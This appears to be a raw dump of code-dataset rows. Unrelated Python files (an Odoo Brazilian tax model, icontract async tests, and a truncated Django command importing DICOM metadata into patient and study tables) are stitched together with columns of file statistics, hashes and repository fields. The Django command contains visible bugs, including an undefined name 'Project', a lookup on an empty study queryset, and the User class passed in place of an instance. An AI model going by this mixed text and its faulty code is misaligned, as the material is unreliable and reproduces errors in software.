assert res["email"] == "test@test.test"
assert res["public_name"] == "test user"
assert res["profile"] == "users"
| 42.600229
| 100
| 0.620323
| 21,524
| 185,737
| 5.105138
| 0.017841
| 0.024135
| 0.039724
| 0.045821
| 0.966574
| 0.961441
| 0.959257
| 0.955507
| 0.952604
| 0.946834
| 0
| 0.00994
| 0.264465
| 185,737
| 4,359
| 101
| 42.610002
| 0.79438
| 0.029929
| 0
| 0.858901
| 0
| 0
| 0.135769
| 0.034224
| 0
| 0
| 0
| 0.000459
| 0.121204
| 1
| 0.022251
| false
| 0.050524
| 0.005236
| 0
| 0.036126
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
b88cd4465e0998bfde8cf5d3b06ed7ccc113054a
| 2,126
|
py
|
Python
|
apps/odoo/lib/odoo-10.0.post20170615-py2.7.egg/odoo/addons/l10n_br/models/account.py
|
gtfarng/Odoo_migrade
|
9cc28fae4c379e407645248a29d22139925eafe7
|
[
"Apache-2.0"
] | 1
|
2019-12-19T01:53:13.000Z
|
2019-12-19T01:53:13.000Z
|
apps/odoo/lib/odoo-10.0.post20170615-py2.7.egg/odoo/addons/l10n_br/models/account.py
|
gtfarng/Odoo_migrade
|
9cc28fae4c379e407645248a29d22139925eafe7
|
[
"Apache-2.0"
] | null | null | null |
apps/odoo/lib/odoo-10.0.post20170615-py2.7.egg/odoo/addons/l10n_br/models/account.py
|
gtfarng/Odoo_migrade
|
9cc28fae4c379e407645248a29d22139925eafe7
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import fields, models
class AccountTaxTemplate(models.Model):
""" Add fields used to define some brazilian taxes """
_inherit = 'account.tax.template'
tax_discount = fields.Boolean(string='Discount this Tax in Prince',
help="Mark it for (ICMS, PIS e etc.).")
base_reduction = fields.Float(string='Redution', digits=0, required=True,
help="Um percentual decimal em % entre 0-1.", default=0)
amount_mva = fields.Float(string='MVA Percent', digits=0, required=True,
help="Um percentual decimal em % entre 0-1.", default=0)
amount_type = fields.Selection([('group', 'Group of Taxes'),
('fixed', 'Fixed'),
('percent', 'Percentage of Price'),
('division', 'Percentage of Price Tax Included')],
string='Tax Computation', required=True, default='percent')
class AccountTax(models.Model):
""" Add fields used to define some brazilian taxes """
_inherit = 'account.tax'
tax_discount = fields.Boolean(string='Discount this Tax in Prince',
help="Mark it for (ICMS, PIS e etc.).")
base_reduction = fields.Float(string='Redution', digits=0, required=True,
help="Um percentual decimal em % entre 0-1.", default=0)
amount_mva = fields.Float(string='MVA Percent', digits=0, required=True,
help="Um percentual decimal em % entre 0-1.", default=0)
amount_type = fields.Selection([('group', 'Group of Taxes'),
('fixed', 'Fixed'),
('percent', 'Percentage of Price'),
('division', 'Percentage of Price Tax Included')],
string='Tax Computation', required=True, default='percent')
| 54.512821
| 97
| 0.535748
| 223
| 2,126
| 5.06278
| 0.331839
| 0.063773
| 0.06023
| 0.067316
| 0.875111
| 0.875111
| 0.875111
| 0.875111
| 0.875111
| 0.875111
| 0
| 0.012257
| 0.347601
| 2,126
| 38
| 98
| 55.947368
| 0.80173
| 0.08984
| 0
| 0.814815
| 0
| 0
| 0.295159
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.037037
| 0
| 0.481481
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b22de361f7cd05216856495a40345c7f6ccebbfa
| 9,575
|
py
|
Python
|
tests_3_8/async/test_args_and_kwargs_in_contract.py
|
kklein/icontract
|
718ef1733cc2cce6d3c8f59a5a37de96f8be6664
|
[
"MIT"
] | 244
|
2018-08-15T22:58:58.000Z
|
2022-03-12T16:10:39.000Z
|
tests_3_8/async/test_args_and_kwargs_in_contract.py
|
kklein/icontract
|
718ef1733cc2cce6d3c8f59a5a37de96f8be6664
|
[
"MIT"
] | 157
|
2018-08-29T21:36:47.000Z
|
2022-02-14T19:30:24.000Z
|
tests_3_8/async/test_args_and_kwargs_in_contract.py
|
kklein/icontract
|
718ef1733cc2cce6d3c8f59a5a37de96f8be6664
|
[
"MIT"
] | 23
|
2019-04-24T11:09:10.000Z
|
2022-02-14T15:56:26.000Z
|
# pylint: disable=missing-docstring
# pylint: disable=no-self-use
# pylint: disable=invalid-name
# pylint: disable=unused-argument
# pylint: disable=unnecessary-lambda
import copy
import textwrap
import unittest
from typing import Optional, Any, Tuple, Dict
import icontract
import tests.error
class TestArgs(unittest.IsolatedAsyncioTestCase):
async def test_args_without_variable_positional_arguments(self) -> None:
recorded_args = None # type: Optional[Tuple[Any, ...]]
def set_args(args: Tuple[Any, ...]) -> bool:
nonlocal recorded_args
recorded_args = copy.copy(args)
return True
@icontract.require(lambda _ARGS: set_args(_ARGS))
async def some_func(x: int) -> None:
pass
await some_func(3)
assert recorded_args is not None
self.assertTupleEqual((3, ), recorded_args)
async def test_args_with_named_and_variable_positional_arguments(self) -> None:
recorded_args = None # type: Optional[Tuple[Any, ...]]
def set_args(args: Tuple[Any, ...]) -> bool:
nonlocal recorded_args
recorded_args = copy.copy(args)
return True
@icontract.require(lambda _ARGS: set_args(_ARGS))
async def some_func(x: int, *args: Any) -> None:
pass
await some_func(3, 2)
assert recorded_args is not None
self.assertTupleEqual((3, 2), recorded_args)
async def test_args_with_only_variable_positional_arguments(self) -> None:
recorded_args = None # type: Optional[Tuple[Any, ...]]
def set_args(args: Tuple[Any, ...]) -> bool:
nonlocal recorded_args
recorded_args = copy.copy(args)
return True
@icontract.require(lambda _ARGS: set_args(_ARGS))
async def some_func(*args: Any) -> None:
pass
await some_func(3, 2, 1)
assert recorded_args is not None
self.assertTupleEqual((3, 2, 1), recorded_args)
async def test_args_with_uncommon_variable_positional_arguments(self) -> None:
recorded_args = None # type: Optional[Tuple[Any, ...]]
def set_args(args: Tuple[Any, ...]) -> bool:
nonlocal recorded_args
recorded_args = copy.copy(args)
return True
@icontract.require(lambda _ARGS: set_args(_ARGS))
async def some_func(*arguments: Any) -> None:
pass
await some_func(3, 2, 1, 0)
assert recorded_args is not None
self.assertTupleEqual((3, 2, 1, 0), recorded_args)
async def test_fail(self) -> None:
@icontract.require(lambda _ARGS: len(_ARGS) > 2)
async def some_func(*args: Any) -> None:
pass
violation_error = None # type: Optional[icontract.ViolationError]
try:
await some_func(3)
except icontract.ViolationError as err:
violation_error = err
assert violation_error is not None
self.assertEqual(
textwrap.dedent('''\
len(_ARGS) > 2:
_ARGS was (3,)
args was 3
len(_ARGS) was 1'''), tests.error.wo_mandatory_location(str(violation_error)))
class TestKwargs(unittest.IsolatedAsyncioTestCase):
async def test_kwargs_without_variable_keyword_arguments(self) -> None:
recorded_kwargs = None # type: Optional[Dict[str, Any]]
def set_kwargs(kwargs: Dict[str, Any]) -> bool:
nonlocal recorded_kwargs
recorded_kwargs = copy.copy(kwargs)
return True
@icontract.require(lambda _KWARGS: set_kwargs(_KWARGS))
async def some_func(x: int) -> None:
pass
await some_func(x=3)
assert recorded_kwargs is not None
self.assertDictEqual({"x": 3}, recorded_kwargs)
async def test_kwargs_with_named_and_variable_keyword_arguments(self) -> None:
recorded_kwargs = None # type: Optional[Dict[str, Any]]
def set_kwargs(kwargs: Dict[str, Any]) -> bool:
nonlocal recorded_kwargs
recorded_kwargs = copy.copy(kwargs)
return True
@icontract.require(lambda _KWARGS: set_kwargs(_KWARGS))
async def some_func(x: int, **kwargs: Any) -> None:
pass
await some_func(x=3, y=2)
assert recorded_kwargs is not None
self.assertDictEqual({"x": 3, "y": 2}, recorded_kwargs)
async def test_kwargs_with_only_variable_keyword_arguments(self) -> None:
recorded_kwargs = None # type: Optional[Dict[str, Any]]
def set_kwargs(kwargs: Dict[str, Any]) -> bool:
nonlocal recorded_kwargs
recorded_kwargs = copy.copy(kwargs)
return True
@icontract.require(lambda _KWARGS: set_kwargs(_KWARGS))
async def some_func(**kwargs: Any) -> None:
pass
await some_func(x=3, y=2, z=1)
assert recorded_kwargs is not None
self.assertDictEqual({"x": 3, "y": 2, "z": 1}, recorded_kwargs)
async def test_kwargs_with_uncommon_argument_name_for_variable_keyword_arguments(self) -> None:
recorded_kwargs = None # type: Optional[Dict[str, Any]]
def set_kwargs(kwargs: Dict[str, Any]) -> bool:
nonlocal recorded_kwargs
recorded_kwargs = copy.copy(kwargs)
return True
@icontract.require(lambda _KWARGS: set_kwargs(_KWARGS))
async def some_func(**parameters: Any) -> None:
pass
await some_func(x=3, y=2, z=1, a=0)
assert recorded_kwargs is not None
self.assertDictEqual({"x": 3, "y": 2, "z": 1, "a": 0}, recorded_kwargs)
async def test_fail(self) -> None:
@icontract.require(lambda _KWARGS: 'x' in _KWARGS)
async def some_func(**kwargs: Any) -> None:
pass
violation_error = None # type: Optional[icontract.ViolationError]
try:
await some_func(y=3)
except icontract.ViolationError as err:
violation_error = err
assert violation_error is not None
self.assertEqual(
textwrap.dedent("""\
'x' in _KWARGS:
_KWARGS was {'y': 3}
y was 3"""), tests.error.wo_mandatory_location(str(violation_error)))
class TestArgsAndKwargs(unittest.IsolatedAsyncioTestCase):
async def test_that_args_and_kwargs_are_both_passed_as_placeholders(self) -> None:
recorded_args = None # type: Optional[Tuple[Any, ...]]
recorded_kwargs = None # type: Optional[Dict[str, Any]]
def set_args_and_kwargs(args: Tuple[Any, ...], kwargs: Dict[str, Any]) -> bool:
nonlocal recorded_args
nonlocal recorded_kwargs
recorded_args = copy.copy(args)
recorded_kwargs = copy.copy(kwargs)
return True
@icontract.require(lambda _ARGS, _KWARGS: set_args_and_kwargs(_ARGS, _KWARGS))
async def some_func(*args: Any, **kwargs: Any) -> None:
pass
await some_func(5, x=10, y=20, z=30)
assert recorded_args is not None
self.assertTupleEqual((5, ), recorded_args)
assert recorded_kwargs is not None
self.assertDictEqual({"x": 10, "y": 20, "z": 30}, recorded_kwargs)
async def test_a_very_mixed_case(self) -> None:
recorded_args = None # type: Optional[Tuple[Any, ...]]
recorded_kwargs = None # type: Optional[Dict[str, Any]]
def set_args_and_kwargs(args: Tuple[Any, ...], kwargs: Dict[str, Any]) -> bool:
nonlocal recorded_args
nonlocal recorded_kwargs
recorded_args = copy.copy(args)
recorded_kwargs = copy.copy(kwargs)
return True
@icontract.require(lambda _ARGS, _KWARGS: set_args_and_kwargs(_ARGS, _KWARGS))
async def some_func(x: int, y: int, *args: Any, **kwargs: Any) -> None:
pass
await some_func(5, 10, 20, z=30)
assert recorded_args is not None
self.assertTupleEqual((5, 10, 20), recorded_args)
assert recorded_kwargs is not None
self.assertDictEqual({"z": 30}, recorded_kwargs)
class TestConflictOnARGSReported(unittest.IsolatedAsyncioTestCase):
async def test_in_kwargs_in_call(self) -> None:
@icontract.require(lambda _ARGS: True)
async def some_func(*args, **kwargs) -> None: # type: ignore
pass
type_error = None # type: Optional[TypeError]
try:
await some_func(_ARGS="something")
except TypeError as error:
type_error = error
assert type_error is not None
self.assertEqual('The arguments of the function call include "_ARGS" '
'which is a placeholder for positional arguments in a condition.', str(type_error))
class TestConflictOnKWARGSReported(unittest.IsolatedAsyncioTestCase):
async def test_in_kwargs_in_call(self) -> None:
@icontract.require(lambda _ARGS: True)
async def some_func(*args, **kwargs) -> None: # type: ignore
pass
type_error = None # type: Optional[TypeError]
try:
await some_func(_KWARGS="something")
except TypeError as error:
type_error = error
assert type_error is not None
self.assertEqual('The arguments of the function call include "_KWARGS" '
'which is a placeholder for keyword arguments in a condition.', str(type_error))
if __name__ == '__main__':
unittest.main()
| 34.692029
| 108
| 0.623708
| 1,160
| 9,575
| 4.926724
| 0.101724
| 0.062992
| 0.044794
| 0.036395
| 0.88399
| 0.844619
| 0.841645
| 0.793351
| 0.789151
| 0.726334
| 0
| 0.011134
| 0.277702
| 9,575
| 275
| 109
| 34.818182
| 0.815211
| 0.072585
| 0
| 0.656566
| 0
| 0
| 0.054878
| 0
| 0
| 0
| 0
| 0
| 0.161616
| 1
| 0.050505
| false
| 0.075758
| 0.030303
| 0
| 0.156566
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
b255a7af425df26e05e8fb2c44b1dfc4dc6eebef
| 59,494
|
py
|
Python
|
data_base/management/commands/closepoll.py
|
Nicolas570/chris_db
|
a13853269847a0cbfa2be9ff7a4330ee1a38db21
|
[
"MIT"
] | null | null | null |
data_base/management/commands/closepoll.py
|
Nicolas570/chris_db
|
a13853269847a0cbfa2be9ff7a4330ee1a38db21
|
[
"MIT"
] | null | null | null |
data_base/management/commands/closepoll.py
|
Nicolas570/chris_db
|
a13853269847a0cbfa2be9ff7a4330ee1a38db21
|
[
"MIT"
] | null | null | null |
import os, pydicom, json
from django.core.management.base import BaseCommand
from polls.models import Patient, Study, Series, MR_Params, US_Params, CT_Params, User, Group
class Command(BaseCommand):
help = 'Finding .dcm files and complite tables'
def handle(self, *args, **options):
################################################################################
# frist this application read the dcm list file which contain each path of each
# frist dicom of each dicom folders.
# then we use all those paths and we change the path to get the meta.json file
################################################################################
#dcmTree = '/neuro/users/nicolas.charlet/CodeDcmDb/db_dcm.lst'
dcmTree = '/neuro/users/nicolas.charlet/db_dcm.lst'
if len(args) == 2:
if args[0] == 'path':
dcmTree = args[1]
data = [line.strip() for line in open(dcmTree, 'r')]
N_lignes = len(data)
for line in data:
#dcmFile = '/neuro/users/chris/data/%s' % line
dcmFile = '/neuro/users/nicolas.charlet/ChrisDbTest/%s' % line
t = line
t_l = t.split('/')
t_l[4] = 'meta.json'
nline = '/'.join(t_l)
#metaFile = '/neuro/users/chris/data/%s' % nline
metaFile = '/neuro/users/nicolas.charlet/ChrisDbTest/%s' % nline
print(dcmFile)
print(metaFile)
b_metaFileExists = False
################################################################################
# here we read each dicoms with pydicom and each metaFile as json file.
# then we test if Series, study or patient allready exists.
################################################################################
ds = pydicom.read_file(dcmFile)
try:
with open(metaFile) as meta:
data = json.load(meta)
b_metaFileExists = True
except:
print('no .json detected')
pass
test_SeriesInstanceUID=str(ds.SeriesInstanceUID)
test_StudyInstanceUID=str(ds.StudyInstanceUID)
test_PatientID=str(ds.PatientID)
search1 = Series.objects.all().filter(SeriesInstanceUID=test_SeriesInstanceUID)
#print(search1)
search2 = Study.objects.all().filter(StudyInstanceUID=test_StudyInstanceUID)
#print(search2)
search3 = Patient.objects.all().filter(PatientID=test_PatientID)
#print(search3)
################################################################################
# the first search is the case where the series allready exist, if it exist
# we don't add this series in the data base.
################################################################################
if search1.exists():
print('series already exists')
#on fait rien, la SeriesInstanceUID existe deja
for line in data:
UserID = data[line]['uid']
GroupId = data[line]['gid']
test_uid = UserID
test_gid = GroupId
print(test_uid)
print(test_gid)
################################################################################
# now we test if user are allready linked to this series or not.
# then if it exist we check if the group is link to the user and if it exist
# allready.
################################################################################
searchSUser = Series.objects.filter(user__UserID__startswith=test_uid)
# print('user id:')
# print(searchSUser)
searchUser = User.objects.all().filter(UserID=test_uid)
searchUGroup = User.objects.filter(group__GroupId__startswith=test_gid)
searchGroup = Group.objects.all().filter(GroupId=test_gid)
if searchUser.exists():
if searchSUser.exists():
print('user already in the series')
else:
search1.first().user.add(searchUser.first())
print('user added')
if searchUGroup.exists():
#print("user & group exist ")
print('user already in the data base')
else:
if searchGroup.exists():
#print("user & group exist but user not in that group")
searchUser.first().group.add(searchGroup.first())
else:
#print("user exist but not group")
####################### Group table ######################
try:
GroupName = data[line]['groupname']
except NameError:
GroupName = 'undefined'
except AttributeError:
GroupName = 'undefined'
try:
GroupId = data[line]['gid']
except NameError:
GroupId = 'undefined'
except AttributeError:
GroupId = 'undefined'
try:
GroupProject = data[line]['project']
except NameError:
GroupProject = 'undefined'
except AttributeError:
GroupProject = 'undefined'
gr=Group.objects.create(GroupName=GroupName,GroupId=GroupId,Project=Project)
gr.save()
searchUser.first().group.add(gr)
else:
#print("new user & new group")
####################### Group table ######################
if searchGroup.exists():
#print("user not exist & group exist")
####################### User table ######################
try:
UserName = data[line]['username']
except NameError:
UserName = 'undefined'
except AttributeError:
UserName = 'undefined'
try:
RealName = data[line]['username']
except NameError:
RealName = 'undefined'
except AttributeError:
RealName = 'undefined'
try:
UserID = data[line]['uid']
except NameError:
UserID = 'undefined'
except AttributeError:
UserID = 'undefined'
try:
Email = data[line]['email']
except NameError:
Email = 'undefined'
except AttributeError:
Email = 'undefined'
user=User.objects.create(UserName=UserName,RealName=RealName,
UserID=UserID,Email=Email)
user.save()
user.group.add(searchGroup.first())
search1.first().user.add(user)
else:
####################### Group table ######################
try:
GroupName = data[line]['groupname']
except NameError:
GroupName = 'undefined'
except AttributeError:
GroupName = 'undefined'
try:
GroupId = data[line]['gid']
except NameError:
GroupId = 'undefined'
except AttributeError:
GroupId = 'undefined'
try:
GroupProject = data[line]['project']
except NameError:
GroupProject = 'undefined'
except AttributeError:
GroupProject = 'undefined'
gr=Group.objects.create(GroupName=GroupName,GroupId=GroupId,GroupProject=GroupProject)
gr.save()
#print("group")
####################### User table ######################
try:
UserName = data[line]['username']
except NameError:
UserName = 'undefined'
except AttributeError:
UserName = 'undefined'
try:
RealName = data[line]['username']
except NameError:
RealName = 'undefined'
except AttributeError:
RealName = 'undefined'
try:
UserID = data[line]['uid']
except NameError:
UserID = 'undefined'
except AttributeError:
UserID = 'undefined'
try:
Email = data[line]['email']
except NameError:
Email = 'undefined'
except AttributeError:
Email = 'undefined'
user=User.objects.create(UserName=UserName,RealName=RealName,
UserID=UserID,Email=Email)
user.save()
user.group.add(gr)
search1.first().user.add(User)
#print("end")
################################################################################
# this case is when the study allready exist so we don't create the same study
# and patient twice.
# Compare to the first case we don't check if the user is allready link to the
# series, we just link then directly.
################################################################################
elif search2.exists():
####################### Series table ######################
try:
SeriesNumber=ds.SeriesNumber
except NameError:
SeriesNumber = 'undefined'
except AttributeError:
SeriesNumber = 'undefined'
try:
SeriesInstanceUID=str(ds.SeriesInstanceUID)
except NameError:
SeriesInstanceUID = 'undefined'
except AttributeError:
SeriesInstanceUID = 'undefined'
try:
ProtocolName=ds.ProtocolName
except NameError:
ProtocolName = 'undefined'
except AttributeError:
ProtocolName = 'undefined'
try:
Modality=ds.Modality
except NameError:
Modality = 'undefined'
except AttributeError:
Modality = 'undefined'
try:
SeriesDescription=ds.SeriesDescription
except NameError:
SeriesDescription = 'undefined'
except AttributeError:
SeriesDescription = 'undefined'
try:
SeriesTime=ds.SeriesTime
except NameError:
SeriesTime = 'undefined'
except AttributeError:
SeriesTime = 'undefined'
try:
ContrastAgent=ds.ContrastAgent
except NameError:
ContrastAgent = 'undefined'
except AttributeError:
ContrastAgent = 'undefined'
try:
ScanningSequence=ds.ScanningSequence
except NameError:
ScanningSequence = 'undefined'
except AttributeError:
ScanningSequence = 'undefined'
try:
BodyPartExaminated=ds.BodyPartExaminated
except NameError:
BodyPartExaminated = 'undefined'
except AttributeError:
BodyPartExaminated = 'undefined'
try:
AcquisitionNumber=ds.AcquisitionNumber
except NameError:
AcquisitionNumber = 'undefined'
except AttributeError:
AcquisitionNumber = 'undefined'
b3=Series(SeriesNumber=SeriesNumber,SeriesInstanceUID=SeriesInstanceUID,ProtocolName=ProtocolName,Modality=Modality,
SeriesDescription=SeriesDescription,SeriesTime=SeriesTime,ContrastAgent=ContrastAgent,ScanningSequence=ScanningSequence,
BodyPartExaminated=BodyPartExaminated,AcquisitionNumber=AcquisitionNumber,study=search2.first())
b3.save()
# group and user table
for line in data:
UserID = data[line]['uid']
GroupId = data[line]['gid']
test_uid = UserID
test_gid = GroupId
print(test_uid)
print(test_gid)
searchUser = User.objects.all().filter(UserID=test_uid)
searchUGroup = User.objects.filter(group__GroupId__startswith=test_gid)
searchGroup = Group.objects.all().filter(GroupId=test_gid)
if searchUser.exists():
b3.user.add(searchUser.first())
if searchUGroup.exists():
#print("user & group exist ")
print('user already in the data base')
else:
if searchGroup.exists():
#print("user & group exist but user not in that group")
searchUser.first().group.add(searchGroup.first())
else:
#print("user exist but not group")
####################### Group table ######################
try:
GroupName = data[line]['groupname']
except NameError:
GroupName = 'undefined'
except AttributeError:
GroupName = 'undefined'
try:
GroupId = data[line]['gid']
except NameError:
GroupId = 'undefined'
except AttributeError:
GroupId = 'undefined'
try:
GroupProject = data[line]['project']
except NameError:
GroupProject = 'undefined'
except AttributeError:
GroupProject = 'undefined'
gr=Group.objects.create(GroupName=GroupName,GroupId=GroupId,Project=Project)
gr.save()
searchUser.first().group.add(gr)
else:
#print("new user & new group")
####################### Group table ######################
if searchGroup.exists():
#print("user not exist & group exist")
####################### User table ######################
try:
UserName = data[line]['username']
except NameError:
UserName = 'undefined'
except AttributeError:
UserName = 'undefined'
try:
RealName = data[line]['username']
except NameError:
RealName = 'undefined'
except AttributeError:
RealName = 'undefined'
try:
UserID = data[line]['uid']
except NameError:
UserID = 'undefined'
except AttributeError:
UserID = 'undefined'
try:
Email = data[line]['email']
except NameError:
Email = 'undefined'
except AttributeError:
Email = 'undefined'
user=User.objects.create(UserName=UserName,RealName=RealName,
UserID=UserID,Email=Email)
user.save()
user.group.add(searchGroup.first())
b3.user.add(user)
else:
####################### Group table ######################
try:
GroupName = data[line]['groupname']
except NameError:
GroupName = 'undefined'
except AttributeError:
GroupName = 'undefined'
try:
GroupId = data[line]['gid']
except NameError:
GroupId = 'undefined'
except AttributeError:
GroupId = 'undefined'
try:
GroupProject = data[line]['project']
except NameError:
GroupProject = 'undefined'
except AttributeError:
GroupProject = 'undefined'
gr=Group.objects.create(GroupName=GroupName,GroupId=GroupId,GroupProject=GroupProject)
gr.save()
#print("group")
####################### User table ######################
try:
UserName = data[line]['username']
except NameError:
UserName = 'undefined'
except AttributeError:
UserName = 'undefined'
try:
RealName = data[line]['username']
except NameError:
RealName = 'undefined'
except AttributeError:
RealName = 'undefined'
try:
UserID = data[line]['uid']
except NameError:
UserID = 'undefined'
except AttributeError:
UserID = 'undefined'
try:
Email = data[line]['email']
except NameError:
Email = 'undefined'
except AttributeError:
Email = 'undefined'
user=User.objects.create(UserName=UserName,RealName=RealName,
UserID=UserID,Email=Email)
user.save()
user.group.add(gr)
b3.user.add(user)
#print("end")
############ MR_Params table ##############
try:
PixelSpacing=ds.PixelSpacing
except NameError:
PixelSpacing = 'undefined'
except AttributeError:
PixelSpacing = 'undefined'
try:
SliceThickness=ds.SliceThickness
except NameError:
SliceThickness = 'undefined'
except AttributeError:
SliceThickness = 'undefined'
try:
EchoTime=ds.EchoTime
except NameError:
EchoTime = 'undefined'
except AttributeError:
EchoTime = 'undefined'
try:
EchoNumbers=ds.EchoNumbers
except NameError:
EchoNumbers = 'undefined'
except AttributeError:
EchoNumbers = 'undefined'
try:
InversionTime=ds.InversionTime
except NameError:
InversionTime = 'undefined'
except AttributeError:
InversionTime = 'undefined'
try:
RepetitionTime=ds.RepetitionTime
except NameError:
RepetitionTime = 'undefined'
except AttributeError:
RepetitionTime = 'undefined'
b4=MR_Params(PixelSpacing=PixelSpacing,SliceThickness=SliceThickness,EchoTime=EchoTime,EchoNumbers=EchoNumbers,
InversionTime=InversionTime,RepetitionTime=RepetitionTime,
modality_params= b3)
b4.save()
############# US_Params ###############
try:
Name=ds.Name
except NameError:
Name = 'undefined'
except AttributeError:
Name = 'undefined'
b5=US_Params(Name=Name,modality_params=b3)
b5.save()
################ CT_Params ####################
try:
Name=ds.Name
except NameError:
Name = 'undefined'
except AttributeError:
Name = 'undefined'
b6=CT_Params(Name=Name,modality_params=b3)
b6.save()
################################################################################
# this case is when the patient allready existe so we just create other tables
# to avoid having the same patient twice.
# for the user and group it is the same the previous case.
################################################################################
elif search3.exists():
################## Study table ####################
try:
StudyDescription=ds.StudyDescription
except NameError:
StudyDescription = 'undefined'
except AttributeError:
StudyDescription = 'undefined'
try:
StationName=ds.StationName
except NameError:
StationName = 'undefined'
except AttributeError:
StationName = 'undefined'
try:
ManufacturerModelName=ds.ManufacturerModelName
except NameError:
ManufacturerModelName = 'undefined'
except AttributeError:
ManufacturerModelName = 'undefined'
try:
StudyInstanceUID=str(ds.StudyInstanceUID)
except NameError:
StudyInstanceUID = 'undefined'
except AttributeError:
StudyInstanceUID = 'undefined'
try:
Pathology=ds.Pathology
except NameError:
Pathology = 'undefined'
except AttributeError:
Pathology = 'undefined'
try:
StudyDate=ds.StudyDate
except NameError:
StudyDate = 'undefined'
except AttributeError:
StudyDate = 'undefined'
try:
StudyTime=ds.StudyTime
except NameError:
StudyTime = 'undefined'
except AttributeError:
StudyTime = 'undefined'
try:
AccessionNumber=ds.AccessionNumber
except NameError:
AccessionNumber = 'undefined'
except AttributeError:
AccessionNumber = 'undefined'
try:
InstitutionName=ds.InstitutionName
except NameError:
InstitutionName = 'undefined'
except AttributeError:
InstitutionName = 'undefined'
try:
ReferringPhysicianName=ds.ReferringPhysicianName
except NameError:
ReferringPhysicianName = 'undefined'
except AttributeError:
ReferringPhysicianName = 'undefined'
try:
PerformingPhysicianName=ds.PerformingPhysicianName
except NameError:
PerformingPhysicianName = 'undefined'
except AttributeError:
PerformingPhysicianName = 'undefined'
try:
ModalitiesInStudy=ds.ModalitiesInStudy
except NameError:
ModalitiesInStudy = 'undefined'
except AttributeError:
ModalitiesInStudy = 'undefined'
try:
MagneticFieldStrength=ds.MagneticFieldStrength
except NameError:
MagneticFieldStrength = 0
except AttributeError:
MagneticFieldStrength = 0
b2=Study(StudyDescription=StudyDescription,StationName=StationName,ManufacturerModelName=ManufacturerModelName,
StudyInstanceUID=StudyInstanceUID,Pathology=Pathology,StudyDate=StudyDate,
StudyTime=StudyTime,AccessionNumber=AccessionNumber,InstitutionName=InstitutionName,
ReferringPhysicianName=ReferringPhysicianName,ModalitiesInStudy=ModalitiesInStudy,
MagneticFieldStrength=MagneticFieldStrength,patient=search3.first())
b2.save()
####################### Series table ######################
try:
SeriesNumber=ds.SeriesNumber
except NameError:
SeriesNumber = 'undefined'
except AttributeError:
SeriesNumber = 'undefined'
try:
SeriesInstanceUID=str(ds.SeriesInstanceUID)
except NameError:
SeriesInstanceUID = 'undefined'
except AttributeError:
SeriesInstanceUID = 'undefined'
try:
ProtocolName=ds.ProtocolName
except NameError:
ProtocolName = 'undefined'
except AttributeError:
ProtocolName = 'undefined'
try:
Modality=ds.Modality
except NameError:
Modality = 'undefined'
except AttributeError:
Modality = 'undefined'
try:
SeriesDescription=ds.SeriesDescription
except NameError:
SeriesDescription = 'undefined'
except AttributeError:
SeriesDescription = 'undefined'
try:
SeriesTime=ds.SeriesTime
except NameError:
SeriesTime = 'undefined'
except AttributeError:
SeriesTime = 'undefined'
try:
ContrastAgent=ds.ContrastAgent
except NameError:
ContrastAgent = 'undefined'
except AttributeError:
ContrastAgent = 'undefined'
try:
ScanningSequence=ds.ScanningSequence
except NameError:
ScanningSequence = 'undefined'
except AttributeError:
ScanningSequence = 'undefined'
try:
BodyPartExaminated=ds.BodyPartExaminated
except NameError:
BodyPartExaminated = 'undefined'
except AttributeError:
BodyPartExaminated = 'undefined'
try:
AcquisitionNumber=ds.AcquisitionNumber
except NameError:
AcquisitionNumber = 'undefined'
except AttributeError:
AcquisitionNumber = 'undefined'
b3=Series(SeriesNumber=SeriesNumber,SeriesInstanceUID=SeriesInstanceUID,ProtocolName=ProtocolName,Modality=Modality,
SeriesDescription=SeriesDescription,SeriesTime=SeriesTime,ContrastAgent=ContrastAgent,ScanningSequence=ScanningSequence,
BodyPartExaminated=BodyPartExaminated,AcquisitionNumber=AcquisitionNumber,study=search2.first())
b3.save()
# group and user
for line in data:
UserID = data[line]['uid']
GroupId = data[line]['gid']
test_uid = UserID
test_gid = GroupId
print(test_uid)
print(test_gid)
searchUser = User.objects.all().filter(UserID=test_uid)
searchUGroup = User.objects.filter(group__GroupId__startswith=test_gid)
searchGroup = Group.objects.all().filter(GroupId=test_gid)
#searchSUser = Series.objects.filter(user__GroupId__startswith=)
if searchUser.exists():
b3.user.add(searchUser.first())
if searchUGroup.exists():
#print("user & group exist ")
print('user already in the data base')
else:
if searchGroup.exists():
#print("user & group exist but user not in that group")
searchUser.first().group.add(searchGroup.first())
else:
#print("user exist but not group")
####################### Group table ######################
try:
GroupName = data[line]['groupname']
except NameError:
GroupName = 'undefined'
except AttributeError:
GroupName = 'undefined'
try:
GroupId = data[line]['gid']
except NameError:
GroupId = 'undefined'
except AttributeError:
GroupId = 'undefined'
try:
GroupProject = data[line]['project']
except NameError:
GroupProject = 'undefined'
except AttributeError:
GroupProject = 'undefined'
gr=Group.objects.create(GroupName=GroupName,GroupId=GroupId,Project=Project)
gr.save()
searchUser.first().group.add(gr)
else:
#print("new user & new group")
####################### Group table ######################
if searchGroup.exists():
#print("user not exist & group exist")
####################### User table ######################
try:
UserName = data[line]['username']
except NameError:
UserName = 'undefined'
except AttributeError:
UserName = 'undefined'
try:
RealName = data[line]['username']
except NameError:
RealName = 'undefined'
except AttributeError:
RealName = 'undefined'
try:
UserID = data[line]['uid']
except NameError:
UserID = 'undefined'
except AttributeError:
UserID = 'undefined'
try:
Email = data[line]['email']
except NameError:
